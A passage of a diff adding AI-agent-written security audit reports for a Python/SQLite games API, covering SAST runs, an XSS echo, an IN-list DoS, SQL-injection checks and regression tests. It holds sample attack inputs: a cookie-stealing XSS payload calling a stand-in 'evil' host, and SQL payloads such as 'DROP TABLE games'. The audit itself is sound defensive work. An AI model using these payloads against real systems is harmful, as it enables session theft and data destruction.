+- **OpenAPI schema documents `FilterCriterion` operator fields as `anyOf [{}, null]`.** Type information is lost. Out of scope to fix — per-field FilterCriterion subclasses are not worth the contract complexity for a debug echo. Noted only.
+- **Repeated query-param keys** (`?platform=steam&platform=epic`) silently keep first value. Undocumented. Pin behavior with a test or raise `QueryParamError`.
+- **Test coverage gaps G1–G4** above (cross-combination, pagination full walk, applied_sort order determinism, repeated keys).
+
+---
+
+## Non-findings
+
+- **SQL injection.** `_query_helpers.build_where_clause` and `build_order_by_clause` interpolate ONLY allow-list-validated field names; user values flow through `?` placeholders. Defensive re-check at builder layer (`build_where_clause` re-validates field names against the allow-list even though the parser already did) is good belt-and-suspenders. `TestSqlInjectionResistance::test_build_where_never_interpolates_values` (Hypothesis property test) pins this.
+- **`extra="forbid"` schema strictness.** Correctly applied on every response model; `additionalProperties: false` reflected in OpenAPI schema. Schema-drift will be caught at CI.
+- **`limit > MAX_LIMIT` clamp behavior.** Loud rejection (400) per D3, not silent clamp. Operator catches their own mistakes.
+- **`tie_breaker` de-duplication when user explicitly sorts by `id`.** `parse_sort` correctly omits the appended tie-breaker if the user's sort already includes `id` in any direction. Verified in `test_tie_breaker_deduplicated_when_user_sorts_by_id`.
+- **Suffix detection longest-first.** `gte` checked before `gt`, `lte` before `lt` — correct. No risk of `_gt` eating the suffix of a `field_gte` key.
+- **`status` Literal in `GameResponse`.** Matches the schema CHECK constraint exactly. Adding a new status will require updating both in the same migration — risk noted in spec §6 risk register.
+- **`last_error` truncation.** 200-char cap with `raw_err[:LAST_ERROR_TRUNCATE]`. Handles None correctly. Defense-in-depth on top of upstream scrubbing — exactly the BL6 pattern.
+- **Pool `PoolError` → 503 mapping.** Consistent with `/health` and `/platforms`. Structured `api.games.read_failed` log emitted. Test `TestGamesPoolFailure::test_pool_error_returns_503` pins this.
+- **COUNT(*) on unfiltered query.** Uses `SCAN games USING COVERING INDEX idx_games_status` — planner picks the smallest covering index automatically. Sub-ms at 500K rows. Spec §6 risk "COUNT becomes slow on huge tables" is well-mitigated.
+- **`json.loads` exception handling in metadata parse.** Catches both `JSONDecodeError` AND `TypeError` (the `isinstance(parsed, dict)` guard handles JSON values that parse to non-dict types like arrays/scalars). Sound.

--- a/tests/uat/sessions/2026-05-20-session-4/agent-results/sast-middleware.md
+++ b/tests/uat/sessions/2026-05-20-session-4/agent-results/sast-middleware.md
@@ -1,0 +1,262 @@
+# UAT-4 SAST + Middleware Audit
+**Agent:** sast-middleware
+**Date:** 2026-05-20
+**Scope:** BL6/BL7 endpoints + `_query_helpers` + BL5 middleware regression
+**Branch:** feat/uat-4-session
+**Persona:** senior security engineer (Phase 2.4 mindset — hunt vulnerabilities, describe concrete exploits)
+
+---
+
+## Tool runs
+
+| Tool | Command | Exit | Result |
+|---|---|---|---|
+| ruff (lint) | `ruff check src/orchestrator/api/ tests/api/` | 0 | "All checks passed!" |
+| ruff (format) | `ruff format --check src/orchestrator/api/ tests/api/` | 0 | "21 files already formatted" |
+| mypy (strict) | `mypy --strict src/orchestrator/api/` | 0 | "Success: no issues found in 9 source files" |
+| semgrep | `semgrep --config p/owasp-top-ten src/orchestrator/api/` | 0 | "0 findings" across 152 rules / 9 files / 100% parsed |
+| gitleaks | `gitleaks detect --no-banner --redact --source .` | 0 | "no leaks found" (123 commits, 3.81 MB scanned) |
+
+**Clean SAST sweep.** All findings below are from manual review, not tool output.
+
+---
+
+## Findings
+
+### SEV-1
+None.
+
+### SEV-2
+
+**S2-A. `_query_helpers.parse_filters` does not validate string-typed filter values; arbitrary content is round-tripped into `applied_filters` echo (defense-in-depth gap that becomes a stored-XSS vector if a downstream UI is naive).**
+
+- **Description.** `_coerce_value` returns `str`-typed filter values verbatim — no format validation. The spec declares `last_prefilled_at` and `last_validated_at` as `value_type=str` for ISO-8601 timestamps, but ANY string is accepted (no regex, no `datetime.fromisoformat` check). The unvalidated value flows two places: (a) into `?` SQL bind (safe — parametric), (b) back into `meta.applied_filters[<field>][<op>]` as the wire echo (UNSAFE — reflection surface).
+- **Concrete exploit / scenario.**
+  1. Attacker who has obtained the bearer token (TM-001 / TM-023) or who tricks an authenticated operator into clicking a crafted URL sends:
+     `GET /api/v1/games?last_prefilled_at_gte=<img src=x onerror=fetch('https://evil/?'+document.cookie)>`
+  2. Server returns 200 with `meta.applied_filters.last_prefilled_at.gte = "<img src=x onerror=...>"`.
+  3. Game_shelf (or any future ops UI / curl-wrapper) that naïvely renders the echo as HTML executes the script in the operator's authenticated browser context.
+- **Affected code.** `src/orchestrator/api/_query_helpers.py:120-136` (`_coerce_value` — `str` path is the unconditional `return raw`); also `src/orchestrator/api/routers/games.py:46-49` (allow-list declares `value_type=str` for both timestamp fields).
+- **Suggested fix.** Add an optional `validator: Callable[[str], None] | None` field to `FilterFieldSpec`. For timestamp fields, set it to `datetime.fromisoformat` (raises `ValueError` → wrapped to `QueryParamError` → 400). Doing this at the API boundary applies the principle: reject bad input at the edge rather than rely on UI sanitization.
+- **Regression test sketch.**
+  ```python
+  def test_iso8601_validation_rejects_xss_payload():
+      with pytest.raises(QueryParamError, match="invalid value"):
+          parse_filters(
+              QueryParams("last_prefilled_at_gte=<script>alert(1)</script>"),
+              allow_list=_games_allow_list(),
+          )
+  ```
+  Plus a router-level test asserting 400 (not 200 with reflected payload).
+
+---
+
+**S2-B. `_in=` operator has no upper bound on number of values; SQLite's default `SQLITE_LIMIT_VARIABLE_NUMBER` (999) can be exceeded → 503 with reader-pool work amplification.**
+
+- **Description.** `parse_filters` splits on `,` with no cap on element count. `build_where_clause` then emits `field IN (?, ?, ?, ...)` with one `?` per value. SQLite caps total bind variables per statement (default 999). A request like `?status_in=a,b,c,...×1500` will fail at `pool.read_one(count_sql, where_params)` with `SQLITE_TOOBIG`/`SQLITE_RANGE` — wrapped to `PoolError` → 503. An attacker with a token can flood `/api/v1/games?status_in=<lots>` to (a) churn the reader pool with failing queries and noisy 503 logs, (b) generate massive per-request log lines (each containing the full param list in structlog event), (c) fingerprint the SQLite build's exact limit.
+- **Concrete exploit / scenario.** Authenticated DoS amplifier. Each request is ~30 KB URL → ~7500-element `IN` list → 503 after ~5 ms of work. At 100 req/s an attacker holds 1+ reader connections busy churning failures and writes ~30 KB × 100/s ≈ 3 MB/s of log data to wherever structlog sinks (disk → fills `/state` volume; remote → bandwidth).
+- **Affected code.** `src/orchestrator/api/_query_helpers.py:179-184` (no len() cap on `raw_value.split(",")`); also `build_where_clause` lines 218-221.
+- **Suggested fix.** Cap `_in` cardinality in `parse_filters` (suggest 100 or `min(50, max_limit)` since matching that many statuses is nonsense). Raise `QueryParamError(f"_in list too long: max 100 values, got {len(values)}")`.
+- **Regression test sketch.**
+  ```python
+  def test_in_operator_rejects_excessive_values():
+      huge = ",".join(["x"] * 200)
+      with pytest.raises(QueryParamError, match="too long"):
+          parse_filters(QueryParams(f"status_in={huge}"), allow_list=_games_allow_list())
+  ```
+
+---
+
+### SEV-3
+
+**S3-A. `build_order_by_clause` lacks the defensive re-validation pattern that `build_where_clause` has — caller-trust gap on SQL identifier interpolation.**
+
+- **Description.** `build_where_clause` (line 214) re-checks `field_name not in allow_list.by_field` before interpolating. `build_order_by_clause` (line 289-294) does NOT take an allow-list and does NOT re-validate — it trusts `SortField.field` was already validated by `parse_sort`. This is asymmetric defense-in-depth. If a future router constructs `SortField` instances manually (e.g., `SortField(field="title; DROP TABLE games", direction="asc")`), the field is f-stringed into the SQL with no check. Worse, `direction` is typed `Literal["asc", "desc"]` but Python doesn't enforce that at runtime — a caller passing `direction="asc; DELETE FROM games"` causes raw injection via `.upper()`.
+- **Concrete exploit / scenario.** No current exploit (router only calls `parse_sort`, which validates). But the helper is explicitly designed to be reused by future paginated endpoints (`/jobs`, `/manifests`, `/stats`, `/block_list`). A future BL adds a router that builds `SortField` from a config file or admin endpoint without going through `parse_sort` → SQL injection.
+- **Affected code.** `src/orchestrator/api/_query_helpers.py:289-294`.
+- **Suggested fix.** Change `build_order_by_clause` signature to `(sort: list[SortField], *, allow_list: SortAllowList)` and re-check both `s.field in allow_list.fields` AND `s.direction in ("asc", "desc")`. Mirror the `build_where_clause` re-check pattern.
+- **Regression test sketch.**
+  ```python
+  def test_order_by_rejects_manually_constructed_wild_field():
+      with pytest.raises(QueryParamError):
+          build_order_by_clause(
+              [SortField(field="title; DROP TABLE games", direction="asc")],
+              allow_list=_games_sort_allow_list(),
+          )
+  ```
+
+---
+
+**S3-B. `build_where_clause` raises `KeyError` (→ 500) instead of `QueryParamError` (→ 400) when caller hands it an unrecognized op.**
+
+- **Description.** Line 223: `_OP_SQL[op].format(field=field_name)` — if `op` is not a key of `_OP_SQL` (only "in" is special-cased earlier), Python raises `KeyError`. The router catches `QueryParamError` for 400 but does not catch `KeyError`, so this becomes a 500 with a stack trace event. The defensive re-check on `field_name` (line 214) does not cover op typos.
+- **Concrete exploit / scenario.** Not user-reachable today (parse_filters allows only ops the suffix loop emits, all of which are in `_OP_SQL`). Becomes user-reachable as soon as a future router constructs the filters dict by hand or adds a new operator name to the suffix loop without updating `_OP_SQL`. Trips immediately during refactor → noisy 500s in prod.
+- **Affected code.** `src/orchestrator/api/_query_helpers.py:223` (the `_OP_SQL[op]` lookup, vs. line 214's `field_name` check).
+- **Suggested fix.** Add a parallel defensive check: `if op != "in" and op not in _OP_SQL: raise QueryParamError(f"unknown operator: {op}")` immediately inside the loop body before line 218.
+- **Regression test sketch.**
+  ```python
+  def test_build_where_rejects_unknown_op():
+      with pytest.raises(QueryParamError, match="unknown operator"):
+          build_where_clause(
+              {"platform": {"contains": "steam"}},  # invalid op
+              allow_list=_games_allow_list(),
+          )
+  ```
+
+---
+
+**S3-C. Hypothesis property test coverage is too narrow to credibly claim "no SQL injection across the helper surface".**
+
+- **Description.** `TestSqlInjectionResistance.test_build_where_never_interpolates_values` (tests/api/test_query_helpers.py:370-392) fuzzes ONLY the `platform` (str) and `size_bytes` (int) values, ONLY with `eq` and `gte` operators, and ONLY one fixed injection payload (`'; DROP TABLE games; --`). The property test does NOT cover:
+  - The `in` operator path (different code path — variable placeholder count)
+  - `ne`, `gt`, `lt`, `lte` operators
+  - `build_order_by_clause` at all (the entire ORDER BY path has zero property coverage)
+  - Field-NAME fuzzing (only values fuzzed; what if `parse_filters` ever leaks a key with `_eq` suffix or weird characters?)
+  - Boundary integers (just `int_range`, not specifically 0, MAX_INT, MIN_INT, NaN-ish floats)
+- **Concrete exploit / scenario.** Future regression where someone refactors the SQL builder to use `format()` for placeholders instead of literal `?` strings — would slip past the existing single-payload test.
+- **Affected code.** `tests/api/test_query_helpers.py:370-392`.
+- **Suggested fix.** Expand the property test to fuzz: all 6 ops × value types × the IN-op variable cardinality. Add a separate `TestOrderBySqlInjection` with `@given(field=st.sampled_from([...sortable_fields + injection_payloads...]))` and assert the payload never appears in the built SQL when validated through `parse_sort`. Use `hypothesis.assume()` to scope inputs.
+- **Regression test sketch.** Property test mutating the operator alongside the value:
+  ```python
+  @given(
+      op=st.sampled_from(["eq", "ne", "gte", "lte", "gt", "lt"]),
+      val=st.one_of(st.integers(), st.text()),
+  )
+  def test_all_ops_use_placeholders(self, op, val):
+      sql, params = build_where_clause(
+          {"size_bytes": {op: val}}, allow_list=_games_allow_list()
+      )
+      assert "?" in sql
+      assert str(val) not in sql  # value never literal
+      assert params == [val]
+  ```
+
+---
+
+**S3-D. `applied_filters` echo wire-shape for the `in` operator is not test-covered; an alias regression would silently emit `"in_"` on the wire.**
+
+- **Description.** `FilterCriterion` uses `in_: list[Any] | None = Field(default=None, alias="in")`. The router builds the criterion via `crit_kwargs["in_"] = value` (games.py:244) then dumps with `model_dump(by_alias=True)` (games.py:262). Pydantic v2 docs say `by_alias=True` propagates to nested models, but `TestGamesAppliedEcho` (tests/api/test_games_router.py:329-346) only verifies `eq` and `gte` round-trip. **Zero tests** verify the `in` echo emits `"in"` (not `"in_"`) on the wire. A future Pydantic upgrade or model refactor that breaks alias-propagation would slip past CI.
+- **Concrete exploit / scenario.** Wire-contract regression. Game_shelf UI parses `meta.applied_filters[field].in` and reads `undefined`, silently breaking the "show active filters" panel without alerting CI.
+- **Affected code.** `src/orchestrator/api/routers/games.py:99-110, 244, 262`; gap in `tests/api/test_games_router.py:329-346`.
+- **Suggested fix.** Add `TestGamesAppliedEcho.test_in_operator_wire_emits_alias`:
+  ```python
+  async def test_in_operator_wire_emits_alias(self, client, games_pool_100):
+      r = await client.get(
+          "/api/v1/games?status_in=not_downloaded,pending_update",
+          headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+      )
+      applied = r.json()["meta"]["applied_filters"]
+      assert "in" in applied["status"]      # wire alias
+      assert "in_" not in applied["status"]  # Python field name
+      assert applied["status"]["in"] == ["not_downloaded", "pending_update"]
+  ```
+
+---
+
+**S3-E. `json.loads(raw_meta)` is not bounded; pathological JSON could trigger `RecursionError` → uncaught 500.**
+
+- **Description.** `routers/games.py:208` parses `metadata` per row inside `try ... except (json.JSONDecodeError, TypeError)`. `RecursionError` is NEITHER. A metadata blob with ~1000 levels of nested `{` is enough to bust Python's default recursion limit on `json.loads`. The exception propagates out of the row loop → uncaught → 500 with a traceback in logs (probably with the row id, which is fine — but a 500 instead of a graceful per-row null).
+- **Concrete exploit / scenario.** No external WRITE path to `games.metadata` exists today, so an attacker cannot place the payload. The F3 library-sync (planned) writes from Steam/Epic API; those APIs return shallow trees in practice. **Pre-emptive fix only** — but cheap to do.
+- **Affected code.** `src/orchestrator/api/routers/games.py:207-215`.
+- **Suggested fix.** Expand the except clause to `(json.JSONDecodeError, TypeError, RecursionError, ValueError)`. Or, more defensively, parse with a depth cap: parse to a string, count `{` chars, reject if > some threshold. Or wrap in a `try/except Exception` since the per-row fallback (`metadata = None` + log warning) is already the graceful behavior.
+- **Regression test sketch.**
+  ```python
+  async def test_pathological_nested_metadata_returns_null(self, client, populated_pool):
+      pathological = "{" * 2000 + "}" * 2000
+      async with populated_pool.write_transaction() as tx:
+          await tx.execute("UPDATE games SET metadata = ? WHERE id = 1", (pathological,))
+      r = await client.get("/api/v1/games?limit=500", headers={"Authorization": f"Bearer {VALID_TOKEN}"})
+      assert r.status_code == 200
+      game = next(g for g in r.json()["games"] if g["id"] == 1)
+      assert game["metadata"] is None
+  ```
+
+---
+
+**S3-F. Field-name design constraint not documented: any future filter field whose name ends in `_eq`/`_in`/`_gt`/`_lt`/`_gte`/`_lte`/`_ne` is unrouteable by `parse_filters`.**
+
+- **Description.** The suffix loop in `parse_filters` (lines 164-170) parses operator suffixes greedily. A hypothetical future field `download_lte` (e.g., "less-than-or-equal download count") would always be parsed as field=`download` + op=`lte`, never as field=`download_lte`. There's no comment in `_query_helpers.py` warning future authors. The risk is silent — a developer adding `download_lte` to the allow_list and shipping it; the suffix loop wins; the field appears to "work" via `?download=N` (an unintended interpretation) and is broken when invoked as `?download_lte=N`.
+- **Concrete exploit / scenario.** Not a security issue. A maintainability foot-gun that becomes a security issue if the field has different security semantics than the prefix it shadows.
+- **Affected code.** `src/orchestrator/api/_query_helpers.py:159-170`.
+- **Suggested fix.** Add a docstring warning AND a runtime guard in `FilterAllowList.__init__`: assert no field name ends in any of the operator suffixes; raise `ValueError` at import time so bad declarations fail at module load (not at runtime).
+- **Regression test sketch.**
+  ```python
+  def test_allow_list_rejects_field_with_op_suffix():
+      with pytest.raises(ValueError, match="reserved operator suffix"):
+          FilterAllowList({"download_lte": FilterFieldSpec(ops={"eq"}, value_type=int)})
+  ```
+
+---
+
+### SEV-4
+
+**S4-A. `last_error` truncation convention is duplicated, not centralized.**
+
+- **Description.** Both `routers/platforms.py:19` and `routers/games.py:37` define a local `_LAST_ERROR_TRUNCATE = 200` constant. The next text column with credential-leak potential (e.g., `jobs.error_text`, `manifests.last_error`) requires the next author to remember to apply the same truncation. There's no central constant or helper.
+- **Suggested fix.** Move `LAST_ERROR_TRUNCATE_CHARS = 200` (and a tiny `truncate_error(s: str | None) -> str | None` helper) into `orchestrator/api/dependencies.py` or `_query_helpers.py`. Document in CHANGELOG / FEATURES the BL6/BL7 truncation pattern for future routers.
+- **Regression test sketch.** N/A — refactor with no behavioral change.
+
+---
+
+**S4-B. Two-query (`COUNT(*)` + `SELECT`) race is design-acknowledged but not test-asserted to fail gracefully.**
+
+- **Description.** `routers/games.py:193-194` issues two separate reads via `_checkout_reader()`, each on its own SQLite connection / WAL snapshot. A concurrent write between the two queries can produce `total` that disagrees with the rows returned: e.g., `total=100`, then a row is inserted, `rows` returns 51 of 101 — `has_more = (0 + 51 < 100) = true`, but on next page `total` may show 101 and rows may shift by one. Spec §6 acknowledges this as "Low likelihood, single-user orchestrator". Not exploitable; mainly correctness-under-concurrency.
+- **Suggested fix.** Out of scope for UAT-4; explicit acceptance test would help (assert `has_more` is consistent within ±1 of the actual remainder after a concurrent insert). Or move the two queries into a single read connection / `BEGIN DEFERRED` (read-locked) transaction if pool API supports it.
+
+---
+
+## Non-findings (verified safe — explicit clearance)
+
+- **`parse_filters` operator-suffix confusion (the prompt's `app_id_in_admin=true` hypothetical).** Traced: key=`app_id_in_admin`. Loop tries `_gte`, `_lte`, `_gt`, `_lt`, `_ne`, `_in`, `_eq` suffixes — none match the trailing `_admin`. Field stays as `app_id_in_admin`, op stays `eq`. Then `app_id_in_admin not in allow_list.by_field` → `QueryParamError("unknown filter field: app_id_in_admin")` → 400. **Cleared.**
+- **`build_where_clause` parametric build.** Every value path uses `?`. Verified: `op == "in"` uses `?, ?, ?` placeholders (line 219); other ops use `_OP_SQL[op]` strings that all contain literal `?` (lines 91-98). No f-string interpolation of values. **Cleared.**
+- **`build_where_clause` defensive field-name re-check (line 214) DOES fire.** Validated via re-reading; if a caller hands the function a filters dict with an unknown field, the re-check raises before f-string interpolation. **Cleared.**
+- **`parse_sort` tie-breaker dedup logic.** `id:desc` produces `[SortField(id, desc)]` only — server tie-breaker `id:asc` is correctly skipped via `any(s.field == tie_breaker.field for s in user_sort)` (line 283). Confirmed by `test_tie_breaker_deduplicated_when_user_sorts_by_id`. **Cleared.**
+- **`parse_sort` case sensitivity.** Direction is `.lower()` (line 269) so `ASC`/`Desc`/`asc` all map to canonical lowercase. Field name is NOT lowercased — so `ID:asc` and `Id:asc` correctly fail allow-list validation. Because they fail, the tie-breaker dedup `s.field == tie_breaker.field` (case-sensitive compare) is never reached with a non-canonical field. **Cleared.**
+- **Bearer enforcement on `/api/v1/games` and `/api/v1/platforms`.** Both paths absent from `AUTH_EXEMPT_PATHS` (dependencies.py:28-33). Confirmed by `TestGamesAuth.test_no_token_returns_401` and equivalent on platforms. **Cleared.**
+- **CorrelationId propagation into `api.games.read_failed` and `api.games.metadata_parse_failed`.** Both `_log` calls execute inside the request scope where `request_context(correlation_id=cid)` (middleware.py:70) has set the structlog contextvar. The error log includes correlation_id automatically. **Cleared.**
+- **BodySizeCap inactivity on GET.** Neither `routers/games.py` nor `routers/platforms.py` calls `request.body()` or otherwise consumes the body. GET requests have no Content-Length (or 0) so Path 1 of `BodySizeCapMiddleware` is skipped and Path 2's `bytes_received` stays 0. No spurious 413s. **Cleared.**
+- **CORS preflight on `/api/v1/games`.** CORS middleware is outermost (UAT-3 S2-F revised order, main.py:165-175); intercepts OPTIONS before BearerAuth sees it. BearerAuth also has an OPTIONS bypass (middleware.py:212) as a belt-and-suspenders. **Cleared.**
+- **`applied_filters` `by_alias=True` propagation for nested `FilterCriterion`.** Pydantic v2 documented behavior is that `model_dump(by_alias=True)` recurses into nested models. Manually verified by reading pydantic v2 source semantics — the alias-emission is correct for `eq`/`gte`/`lte`/`ne`/`gt`/`lt` (no alias defined → field name passes through unchanged) and would correctly emit `"in"` for the aliased `in_` field. Just untested at the integration level (see S3-D). **Cleared (behaviorally), but test gap noted as S3-D.**
+- **Lifespan + boot interaction with 3 routers.** Router import order in main.py (health → platforms → games) has no side effects; module-level `GAMES_FILTER_ALLOW_LIST` construction is pure data with no I/O; routes don't collide (distinct path leaves). `_lazy_app` PEP-562 pattern unchanged. **Cleared.**
+- **Filter allow-list field-name security.** `parse_filters` blocks any field not in the per-endpoint `FilterAllowList.by_field` BEFORE the suffix loop has any influence on SQL. Unicode lookalikes (Cyrillic `о`), percent-encoded NULL, percent-encoded LF — all fail the strict dict-membership check. **Cleared.**
+- **No `print()` / debug logging leaks** in any of the 5 files reviewed. All log calls go through `structlog` (which routes through the ID3 redactor chain — verified separately in UAT-3).
+- **No secrets in source.** gitleaks scan clean across 123 commits / 3.81 MB. No bearer token, no API key, no test token committed.
+
+---
+
+## New threat candidates (beyond TM-001..TM-023)
+
+| ID (proposed) | Vector | Concrete exploit scenario |
+|---|---|---|
+| **TM-024 candidate** | Reflected XSS via `applied_filters` echo | (See S2-A.) Bearer-authenticated attacker sends `?last_prefilled_at_gte=<script>...</script>`; payload echoes verbatim in response JSON; downstream UI (Game_shelf) that naïvely innerHTML's the active-filter panel executes the script in operator context. Mitigation = S2-A. |
+| **TM-025 candidate** | Pool/log amplification via unbounded `_in=` | (See S2-B.) Token-holding attacker posts `?status_in=a,b,c,...×7500`; SQLite rejects with `SQLITE_TOOBIG`, but each request still consumes a reader connection for the round-trip + writes a ~30 KB log event. 100 req/s → fills `/state` volume or saturates remote log sink. Not covered by TM-015 (which presumed bounded query cost). Mitigation = S2-B `_in` cardinality cap. |
+| **TM-026 candidate** | Snapshot drift between `COUNT(*)` and row SELECT | (See S4-B.) Concurrent write between the two reader-pool queries can produce `meta.total` that disagrees with `len(games)`. Not exploitable for code execution; impacts pagination correctness in mixed read/write workload. Currently single-orchestrator + F3 daily = low likelihood. Becomes higher when F3 sync moves to hourly or when a mutating endpoint lands. |
+| **TM-027 candidate** | Future `_query_helpers` caller-trust SQL injection | (See S3-A / S3-B.) The shared helper module is explicitly designed for reuse across `/jobs`, `/manifests`, `/stats`, `/block_list`. Two asymmetric defenses (`build_order_by_clause` not re-validating; `build_where_clause` not catching op typos) mean a future caller can introduce SQL injection or 500s by bypassing `parse_filters`/`parse_sort` and calling the builders directly. Highest-leverage finding because the module is the load-bearing primitive for 4+ future endpoints. |
+| **TM-028 candidate** | Operator-typo silent over-match via field name overlap with operator suffix | (See S3-F.) Future migration adds field whose name ends in a reserved op suffix (`download_lte`, `prefill_in`, `block_ne`); the suffix parser steals the suffix; the developer thinks the field is filterable but it's not, OR worse, accidentally filters a DIFFERENT shorter field with no clear error. Latent foot-gun specific to the operator-suffix syntax chosen in D4. |
+
+---
+
+## Summary table
+
+| Severity | Count | IDs |
+|---|---|---|
+| SEV-1 | 0 | — |
+| SEV-2 | 2 | S2-A (XSS echo), S2-B (unbounded `_in` DoS) |
+| SEV-3 | 6 | S3-A, S3-B, S3-C, S3-D, S3-E, S3-F |
+| SEV-4 | 2 | S4-A, S4-B |
+
+**Recommended Fix-Now (per CLAUDE.md severity rules):** S2-A and S2-B (both SEV-2 — defer to Phase 2→3 gate at the latest, but easy to land in UAT-4 remediation). S3-A and S3-B should ride along because they harden the shared helper before more endpoints inherit it.
+
+---
+
+## Verification commands run
+
+```
+ruff check src/orchestrator/api/ tests/api/        → 0 (clean)
+ruff format --check src/orchestrator/api/ tests/api/ → 0 (21 files formatted)
+mypy --strict src/orchestrator/api/                → 0 (9 files, clean)
+semgrep --config p/owasp-top-ten src/orchestrator/api/ → 0 (152 rules, 0 findings)
+gitleaks detect --no-banner --redact --source .    → 0 (no leaks, 123 commits)
+```
+
+All tool-gate checks pass cleanly. All findings above are from manual SAST + design review, not automated tool output.

--- a/tests/uat/sessions/2026-05-20-session-4/agent-results/sql-injection.md
+++ b/tests/uat/sessions/2026-05-20-session-4/agent-results/sql-injection.md
@@ -1,0 +1,353 @@
+# UAT-4 SQL Injection Deep-Dive
+**Agent:** sql-injection
+**Date:** 2026-05-20
+
+Persona: penetration tester. Goal: break the parametric SQL contract on `_query_helpers.py` (BL7), or document why each attack class fails.
+
+Targets reviewed in full:
+- `src/orchestrator/api/_query_helpers.py`
+- `src/orchestrator/api/routers/games.py` (`count_sql` / `rows_sql` construction at L186-194)
+- `src/orchestrator/db/pool.py` — `read_one` / `read_all` / `_checkout_reader`
+- `docs/superpowers/specs/2026-05-17-bl7-games-readonly-design.md` §4.3 + §6 risk register
+- `tests/api/test_query_helpers.py::TestSqlInjectionResistance`
+
+All behavioural claims below were verified by running the actual module with crafted inputs (script output captured during the audit; see Findings notes).
+
+---
+
+## A: Field-name interpolation walk
+
+### A.1 Trust path from the wire
+
+```
+HTTP query string
+  → request.query_params  (Starlette QueryParams)
+  → parse_filters()  ─── only key strings matched against
+                         allow_list.by_field (dict[str, FilterFieldSpec])
+  → returns dict {field_name: {op: value}} where field_name is
+    GUARANTEED to be a literal key from allow_list.by_field
+  → build_where_clause()  ─── DEFENSIVE re-check: `if field_name not in
+                              allow_list.by_field: raise QueryParamError`
+                              (L214-215)
+  → f"{field_name} = ?".format(...)   (L223) and f"{field_name} IN (...)" (L220)
+```
+
+The interpolation at L220/L223 uses Python f-string composition of `field_name`. For the GAMES endpoint, the allow_list keys are literal source strings (`"platform"`, `"status"`, `"owned"`, `"size_bytes"`, `"last_prefilled_at"`, `"last_validated_at"`) — none of them are derived from user input. There is no code path where user data can mutate the FilterAllowList. Therefore for the games endpoint, the f-string interpolation is safe.
+
+### A.2 Sort field walk
+
+`parse_sort` (L258-286) splits on `,` then on `:`, validates `field_name in allow_list.fields` (L274) and `direction in ("asc","desc")` (L276). The narrowed `direction` is then ascribed to a `Literal["asc","desc"]` (`narrowed_direction`) — runtime cannot smuggle anything past `direction not in ("asc","desc")`.
+
+`build_order_by_clause` (L289-294) does NOT re-validate against the allow-list. It blindly trusts the SortField dataclass.
+
+### A.3 Defensive-recheck attack: a hand-rolled bad allow_list
+
+The defensive re-check in `build_where_clause` validates the field name against the SAME allow-list that originated it. If an endpoint author ever wrote a `FilterAllowList` whose keys themselves contain SQL syntax, the defence is a no-op.
+
+**Verified:**
+```python
+bad_allow = FilterAllowList({"id; DROP TABLE games; --": FilterFieldSpec(ops={"eq"}, value_type=str)})
+build_where_clause({"id; DROP TABLE games; --": {"eq": "x"}}, allow_list=bad_allow)
+# → "WHERE id; DROP TABLE games; -- = ?"
+```
+
+This is a **policy issue**, not a runtime CVE on BL7 — every BL7 caller hardcodes static identifier strings — but it is real surface that future endpoint authors WILL find a way to violate. See SEV-3 finding F-1.
+
+**Verdict:** No exploitable injection through field-name interpolation on the games endpoint as shipped. The defensive recheck is structurally cosmetic (it re-validates against the same dict that produced the key), not a true second line of defence. Field-name safety is a property of the endpoint module, not of `_query_helpers`.
+
+---
+
+## B: Value binding walk
+
+### B.1 String values
+`_coerce_value` (L120-136) returns `raw` unchanged for `value_type is str`. The unchanged string is bound via `params.append(value)` (L224) or `params.extend(value)` (L221) in `build_where_clause`. The pool layer passes `params` to `conn.execute(sql, params)` (pool.py L914, L929) — aiosqlite parameterizes positional binds via SQLite's bind API, not via string interpolation. **No path puts a user string into SQL text.**
+
+Verified: `?platform='; DROP TABLE games; --` produces `WHERE platform = ?` with `params=["'; DROP TABLE games; --"]`. The malicious string never enters the SQL text.
+
+### B.2 int values
+`int(raw)` (L124). On success, an `int` object lands in params. SQLite binds `int` as INTEGER. **Safe.**
+On failure, `ValueError` is wrapped into `QueryParamError` → router returns 400.
+
+Verified: `?size_bytes_gte=0 OR 1=1` raises `QueryParamError("invalid value for size_bytes_gte: '0 OR 1=1'")` because `int("0 OR 1=1")` fails. The classic numeric-injection vector is blocked at parse time, not at SQL build time — even better.
+
+### B.3 float values
+`float(raw)` (L126). Note: `float("nan")` and `float("inf")` SUCCEED in Python. They will be bound to SQLite as floats. SQLite handles NaN/inf cleanly. No SQL escape; just a possibly-surprising query result. No injection.
+
+### B.4 bool values
+Lookup-table coercion against `("1","true","True")` / `("0","false","False")` (L128-131). Anything else raises. Safe.
+
+### B.5 Reserved-key skip
+`parse_filters` skips `limit`, `offset`, `sort` (L152). They are handled by their respective parsers, both of which apply strict validation (`int()` for pagination; allow-list + literal direction for sort). No way to smuggle a filter through a reserved key.
+
+**Verdict:** Value binding surface is clean. Every operator path through `_OP_SQL[op].format(field=field_name)` (L223) and the IN-clause path (L220) places the user value in `params` and a `?` in SQL.
+
+---
+
+## C: IN clause edge cases
+
+### C.1 Empty list — `?status_in=`
+
+`raw_value.split(",")` on an empty string returns `[""]` — a single-element list with the empty string. After `_coerce_value` (str passthrough), the parser stores `{"status": {"in": [""]}}`. `build_where_clause` emits `WHERE status IN (?)` with `params=[""]`. Valid SQL. Returns no rows (status enum has no empty value). **Not a crash, but the user probably expected "match nothing" or 400.**
+
+There is NO code path that produces `WHERE status IN ()` because `split(",")` of an empty string is `[""]`, not `[]`. Verified.
+
+### C.2 Comma-only — `?status_in=,`
+
+`"".split(",")` → `["", ""]`. Produces `WHERE status IN (?, ?)` with `params=["", ""]`. Valid SQL; matches nothing. Verified.
+
+### C.3 1000-item IN list
+
+SQLite 3.32+ (this build: 3.51.3) defaults `SQLITE_MAX_VARIABLE_NUMBER` to **32766**. Verified that 999, 1500, 32766, and 32767 placeholders all execute successfully. So a "999" classical limit attack does not apply here.
+
+However: there is **no upper bound on the number of comma-separated values** in `_in`. An attacker can send `?platform_in=` followed by 1MB of `a,a,a,...`. The string is split, each token is bound. Memory and CPU pressure scale linearly with payload size. The query is short-circuited by the allow-list (only "steam","epic" valid for `platform`), but the parser does all the work BEFORE returning rows.
+
+This is a **resource-exhaustion / DoS surface**, not SQL injection. See SEV-3 finding F-2.
+
+### C.4 `None` values
+The parser never produces `None` — `_coerce_value` returns `raw` (a str), `int(raw)`, `float(raw)`, or `True/False`. None of those routes emit `None`. Safe.
+
+---
+
+## D: ORDER BY field-name surface
+
+### D.1 As shipped
